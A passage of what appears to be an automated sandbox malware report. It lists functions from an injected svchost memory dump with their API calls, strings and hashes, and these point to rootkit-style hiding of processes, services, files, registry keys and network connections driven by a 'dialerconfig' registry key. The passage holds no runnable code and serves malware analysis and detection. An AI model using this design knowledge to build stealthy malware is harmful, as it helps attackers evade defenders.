Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 41E06D3B601704C6EB058F62D80C36A3AE1FB89F0AF16C024CA0907351DF7DC599C750

Function 0000023C9FD9F1EC Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0000023C9FD9F205
FreeEnvironmentStringsW.KERNEL32 ref: 0000023C9FD9F277

Part of subcall function 0000023C9FD9CA0C: HeapAlloc.KERNEL32 ref: 0000023C9FD9CA4A

FreeEnvironmentStringsW.KERNEL32 ref: 0000023C9FD9F2D6

Part of subcall function 0000023C9FD9D744: HeapFree.KERNEL32 ref: 0000023C9FD9D75A
Part of subcall function 0000023C9FD9D744: GetLastError.KERNEL32 ref: 0000023C9FD9D764

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID:
API String ID: 3331406755-0
Opcode ID: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
Instruction ID: f6557c66b56c6872ac1de7e600478dd8ff0236ec382c4d22c79d246fffc99fc4
Opcode Fuzzy Hash: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
Instruction Fuzzy Hash: FC31D933225B50C1EB24DF61644437A7794F784FD5F694225E98AA3BC5DF3CC6918304

Function 0000023C9FD9328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000023C9FD932AE
PathFindFileNameW.SHLWAPI ref: 0000023C9FD932BD

Part of subcall function 0000023C9FD93844: StrCmpNIW.SHLWAPI ref: 0000023C9FD9385C

Part of subcall function 0000023C9FD93790: GetModuleHandleW.KERNEL32 ref: 0000023C9FD9379E
Part of subcall function 0000023C9FD93790: GetCurrentProcess.KERNEL32 ref: 0000023C9FD937CC
Part of subcall function 0000023C9FD93790: VirtualProtectEx.KERNEL32 ref: 0000023C9FD937EE
Part of subcall function 0000023C9FD93790: GetCurrentProcess.KERNEL32 ref: 0000023C9FD93809
Part of subcall function 0000023C9FD93790: VirtualProtectEx.KERNEL32 ref: 0000023C9FD9382A

CreateThread.KERNEL32 ref: 0000023C9FD9330B

Part of subcall function 0000023C9FD91D14: GetCurrentThread.KERNEL32 ref: 0000023C9FD91D1F

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 55455f91b24e61534834da54e7534c5b240e236b9e7244e17661c136f86b0d8f
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 5211803361274082FB60BFB1F84D3792298AF55747F724129D91AA2591EF7CC3C48354

Function 0000023C9FD91ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000023C9FD91628: GetProcessHeap.KERNEL32 ref: 0000023C9FD91633
Part of subcall function 0000023C9FD91628: HeapAlloc.KERNEL32 ref: 0000023C9FD91642
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD916B2
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD916DF
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD916F9
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91719
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD91734
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91754
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD9176F
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD9178F
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD917AA
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD917CA

Sleep.KERNEL32 ref: 0000023C9FD91AD7
SleepEx.KERNELBASE ref: 0000023C9FD91ADD

Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD917E5
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91805
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD91820
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91840
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD9185B
Part of subcall function 0000023C9FD91628: RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD9187B
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD91896
Part of subcall function 0000023C9FD91628: RegCloseKey.ADVAPI32 ref: 0000023C9FD918A0

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: e86c9777ab782df55b82f34e4b551db4e7b06d2da40f16e4b0d0133f8a38cfbe
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: A831236320274141FF519F66D6493B913A5AB45BCBF266421CE09A72D5FF1CCAD1C310

Function 0000023C9FD93844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000023C9FD9385C

Strings

dialer, xrefs: 0000023C9FD93855

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
Instruction ID: b64d195b827d9c602696f12b174718a7dbec88416db533b65e07794dea540fe7
Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
Instruction Fuzzy Hash: E9D05E623127058AFB149FE688CC7742355AB18B4AFD94020C90011150DB5DCADE9710

Function 0000023C9FD6273C Relevance: 1.7, APIs: 1, Instructions: 187
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000023C9FD6285E

Memory Dump Source

Source File: 00000032.00000002.3320486003.0000023C9FD60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd60000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 3a619fa86ca54a05c4de5bba6d8deee738dfcef4faeac7959e32349048c00175
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: 4161F233B0179087DF54CF15980873DB3A2FB95BA6F698126DE5927B88DA3CD952C700

Non-executed Functions

Function 0000023C9FD92B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000023C9FD92BD0
lstrlenW.KERNEL32 ref: 0000023C9FD92E0A

Part of subcall function 0000023C9FD9199C: OpenProcess.KERNEL32 ref: 0000023C9FD919C2
Part of subcall function 0000023C9FD9199C: K32GetModuleFileNameExW.KERNEL32 ref: 0000023C9FD919E0
Part of subcall function 0000023C9FD9199C: PathFindFileNameW.SHLWAPI ref: 0000023C9FD919EF
Part of subcall function 0000023C9FD9199C: lstrlenW.KERNEL32 ref: 0000023C9FD919FB
Part of subcall function 0000023C9FD9199C: StrCpyW.SHLWAPI ref: 0000023C9FD91A0E
Part of subcall function 0000023C9FD9199C: CloseHandle.KERNEL32 ref: 0000023C9FD91A1C

GetProcAddress.KERNEL32 ref: 0000023C9FD92BE5

Part of subcall function 0000023C9FD9152C: StrCmpIW.SHLWAPI ref: 0000023C9FD9155D

Part of subcall function 0000023C9FD93844: StrCmpNIW.SHLWAPI ref: 0000023C9FD9385C

StrCmpNIW.SHLWAPI ref: 0000023C9FD92C28
lstrlenW.KERNEL32 ref: 0000023C9FD92D50

Strings

NtQueryObject, xrefs: 0000023C9FD92BDB
\Device\Nsi, xrefs: 0000023C9FD92C1B
ntdll.dll, xrefs: 0000023C9FD92BC9

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: c7ee9107203d44bdf36ae34525c02def78a0d96f8ae86e0cdae0ec7bb850561a
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: A4B1C323212B5082EB59DFA5D4487B963A4FB46B97F66501AEE0963794DF3DCEC0C340

Function 0000023C9FD97D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000023C9FD97DAC
RtlCaptureContext.NTDLL ref: 0000023C9FD97DD9
RtlLookupFunctionEntry.NTDLL ref: 0000023C9FD97DF3
RtlVirtualUnwind.NTDLL ref: 0000023C9FD97E34
IsDebuggerPresent.KERNEL32 ref: 0000023C9FD97E88
SetUnhandledExceptionFilter.KERNEL32 ref: 0000023C9FD97EA9
UnhandledExceptionFilter.KERNEL32 ref: 0000023C9FD97EB4

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: b66be5f753f9a1e6a56771ef2465323605b3be2834fbd8b588db6c5ca349ed3b
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 6A313E73205B80CAEB609F60E8447ED7364F784749F55442ADA5E67B98EF3CC648C714

Function 0000023C9FD9D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000023C9FD9D31D
RtlLookupFunctionEntry.NTDLL ref: 0000023C9FD9D335
RtlVirtualUnwind.NTDLL ref: 0000023C9FD9D370
IsDebuggerPresent.KERNEL32 ref: 0000023C9FD9D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 0000023C9FD9D3B3
UnhandledExceptionFilter.KERNEL32 ref: 0000023C9FD9D3BE

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: f9ba92a2141ec3dc68b3688644f0a3304593a1e55a1c8035841cfe0f429b0bd5
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: 3F317133215F8086DB60DF65E8443AE73A0F789B5AF650225EA9D53B98DF3CC695CB00

Function 0000023C9FD91628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000023C9FD91633
HeapAlloc.KERNEL32 ref: 0000023C9FD91642

Part of subcall function 0000023C9FD91268: GetProcessHeap.KERNEL32 ref: 0000023C9FD9126E
Part of subcall function 0000023C9FD91268: HeapAlloc.KERNEL32 ref: 0000023C9FD9127D
Part of subcall function 0000023C9FD91268: GetProcessHeap.KERNEL32 ref: 0000023C9FD91297
Part of subcall function 0000023C9FD91268: HeapAlloc.KERNEL32 ref: 0000023C9FD912A8

RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD916B2
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD916DF
RegCloseKey.ADVAPI32 ref: 0000023C9FD916F9
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91719
RegCloseKey.ADVAPI32 ref: 0000023C9FD91734
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91754
RegCloseKey.ADVAPI32 ref: 0000023C9FD9176F
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD9178F
RegCloseKey.ADVAPI32 ref: 0000023C9FD917AA
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD917CA
RegCloseKey.ADVAPI32 ref: 0000023C9FD917E5
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91805
RegCloseKey.ADVAPI32 ref: 0000023C9FD91820
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD91840
RegCloseKey.ADVAPI32 ref: 0000023C9FD9185B
RegOpenKeyExW.ADVAPI32 ref: 0000023C9FD9187B
RegCloseKey.ADVAPI32 ref: 0000023C9FD91896
RegCloseKey.ADVAPI32 ref: 0000023C9FD918A0

Part of subcall function 0000023C9FD912BC: RegQueryInfoKeyW.ADVAPI32 ref: 0000023C9FD91319
Part of subcall function 0000023C9FD912BC: GetProcessHeap.KERNEL32 ref: 0000023C9FD91327
Part of subcall function 0000023C9FD912BC: HeapAlloc.KERNEL32 ref: 0000023C9FD91338
Part of subcall function 0000023C9FD912BC: RegEnumValueW.ADVAPI32 ref: 0000023C9FD91397
Part of subcall function 0000023C9FD912BC: GetProcessHeap.KERNEL32 ref: 0000023C9FD913DF
Part of subcall function 0000023C9FD912BC: HeapAlloc.KERNEL32 ref: 0000023C9FD913ED
Part of subcall function 0000023C9FD912BC: GetProcessHeap.KERNEL32 ref: 0000023C9FD9140A
Part of subcall function 0000023C9FD912BC: HeapFree.KERNEL32 ref: 0000023C9FD91418
Part of subcall function 0000023C9FD912BC: lstrlenW.KERNEL32 ref: 0000023C9FD91421
Part of subcall function 0000023C9FD912BC: GetProcessHeap.KERNEL32 ref: 0000023C9FD9142F
Part of subcall function 0000023C9FD912BC: HeapAlloc.KERNEL32 ref: 0000023C9FD9143D

Strings

tcp_remote, xrefs: 0000023C9FD91839
tcp_local, xrefs: 0000023C9FD917FE
startup, xrefs: 0000023C9FD916D5
SOFTWARE\dialerconfig, xrefs: 0000023C9FD91692
service_names, xrefs: 0000023C9FD917C3
process_names, xrefs: 0000023C9FD9174D
paths, xrefs: 0000023C9FD91788
pid, xrefs: 0000023C9FD91712
udp, xrefs: 0000023C9FD91874

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 00ff3e7dc70780f66e364e3fffae47cb081e8ce491ffe87b295e596850d53c96
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: F0711827311B11C6EB109F65E8987A923A4FB84F8EF121111DE4E67B69EF3CC694D348

Function 0000023C9FD91D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000023C9FD91D1F

Part of subcall function 0000023C9FD91FD4: GetModuleHandleA.KERNEL32 ref: 0000023C9FD91FEC
Part of subcall function 0000023C9FD91FD4: GetProcAddress.KERNEL32 ref: 0000023C9FD91FFD

Part of subcall function 0000023C9FD95B30: GetCurrentThreadId.KERNEL32 ref: 0000023C9FD95B6B

Strings

EnumServicesStatusExW, xrefs: 0000023C9FD91E11, 0000023C9FD91E32
sechost.dll, xrefs: 0000023C9FD91E39
advapi32.dll, xrefs: 0000023C9FD91DF7, 0000023C9FD91E18
NtDeviceIoControlFile, xrefs: 0000023C9FD91E56
EnumServiceGroupW, xrefs: 0000023C9FD91DF0
ntdll.dll, xrefs: 0000023C9FD91D2D
NtQueryDirectoryFileEx, xrefs: 0000023C9FD91D9C
NtResumeThread, xrefs: 0000023C9FD91D62
NtEnumerateValueKey, xrefs: 0000023C9FD91DD6
NtEnumerateKey, xrefs: 0000023C9FD91DB9
NtQueryDirectoryFile, xrefs: 0000023C9FD91D7F
NtQuerySystemInformation, xrefs: 0000023C9FD91D45

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: 32e0c514c15e67092b4d8cf3e36448ca5e605fb48b53fd217be05a92b649f763
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: 6931816B202B4AA0EB06EFA5E85D7F86320B745747FE25623D419325759F3CC38AC394

Function 0000023C9FD9CE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 0000023C9FD9CE37
FlsGetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CE4C
FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CE6D
FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CE9A
FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CEAB
FlsSetValue.KERNEL32(?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CEBC
SetLastError.KERNEL32 ref: 0000023C9FD9CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF0D
FlsSetValue.KERNEL32(?,?,00000001,0000023C9FD9ECCC,?,?,?,?,0000023C9FD9BF9F,?,?,?,?,?,0000023C9FD97AB0), ref: 0000023C9FD9CF2C

Part of subcall function 0000023C9FD9D6CC: HeapAlloc.KERNEL32 ref: 0000023C9FD9D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF54

Part of subcall function 0000023C9FD9D744: HeapFree.KERNEL32 ref: 0000023C9FD9D75A
Part of subcall function 0000023C9FD9D744: GetLastError.KERNEL32 ref: 0000023C9FD9D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023C9FDA0A6B,?,?,?,0000023C9FDA045C,?,?,?,0000023C9FD9C84F), ref: 0000023C9FD9CF76

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 72943e90d7e32eff41b8364ecc90685daeceec26b5f1b16d2aadd79b0beb58a0
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: E3418F2330374542FA69AFB1955E37922829B857B7F3A0724E937376E6DE2C87C19300

Function 0000023C9FD92244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000023C9FD92259
GetCurrentProcessId.KERNEL32 ref: 0000023C9FD92263

Part of subcall function 0000023C9FD91934: OpenProcess.KERNEL32 ref: 0000023C9FD91952
Part of subcall function 0000023C9FD91934: IsWow64Process.KERNEL32 ref: 0000023C9FD91968
Part of subcall function 0000023C9FD91934: CloseHandle.KERNEL32 ref: 0000023C9FD91983

CreateFileW.KERNEL32 ref: 0000023C9FD922BC
WriteFile.KERNEL32 ref: 0000023C9FD922E4
ReadFile.KERNEL32 ref: 0000023C9FD92303
CloseHandle.KERNEL32 ref: 0000023C9FD9230C

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000023C9FD92293
\\.\pipe\dialerchildproc64, xrefs: 0000023C9FD9228C

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 3c1ec7224b6520f0259cbb9759a1b88848df04e4d64bf2f9d1463577e4702a20
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 75212C37614B40C2FB149F25F44C36A77A1F789BAAF614215EA5913BA8DF7CC289CB04

Function 0000023C9FD9A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000023C9FD9A5A1

Part of subcall function 0000023C9FD9B414: __GetUnwindTryBlock.LIBCMT ref: 0000023C9FD9B457
Part of subcall function 0000023C9FD9B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000023C9FD9B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000023C9FD9A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000023C9FD9A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 0000023C9FD9A9DA

Strings

csm, xrefs: 0000023C9FD9A622
csm, xrefs: 0000023C9FD9A5BB
csm, xrefs: 0000023C9FD9A69C

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: 0e1c3c77f64e8f4aa83c67f0269d300be4ae649b87345167c74bed53c09d7bb8
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 3CE1B277602B408AFB20DFA5D4883AD77A0F745BA9F620115EE8967B99CB3CC6C1C701

Function 0000023C9FD9F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0000023C9FD9F510
GetProcAddress.KERNEL32 ref: 0000023C9FD9F51C

Strings

api-ms-, xrefs: 0000023C9FD9F45A
ext-ms-, xrefs: 0000023C9FD9F46D

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: dc8ad38878208d8ca577ebbaeebc6c7377358e1fa9398032812038abc6e92bc4
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: C741C423322F0091FB16CFA6A80C7752391F745BE6F2A4125DD1DAB784EE3CC6859344

Function 0000023C9FD9104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000023C9FD910B1
RegEnumValueW.ADVAPI32 ref: 0000023C9FD91117
GetProcessHeap.KERNEL32 ref: 0000023C9FD9115A
HeapAlloc.KERNEL32 ref: 0000023C9FD91168
GetProcessHeap.KERNEL32 ref: 0000023C9FD91185
HeapFree.KERNEL32 ref: 0000023C9FD91193

Strings

d, xrefs: 0000023C9FD910D6

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: bf4d5e9b72a927c354924b6789bf90666660a3f57e477406bce86737f63aeb7b
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: 4D417133214B84D6E760CF61E4487AE77A1F388B99F558129DB8927B58DF3CC589CB40

Function 0000023C9FD9D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

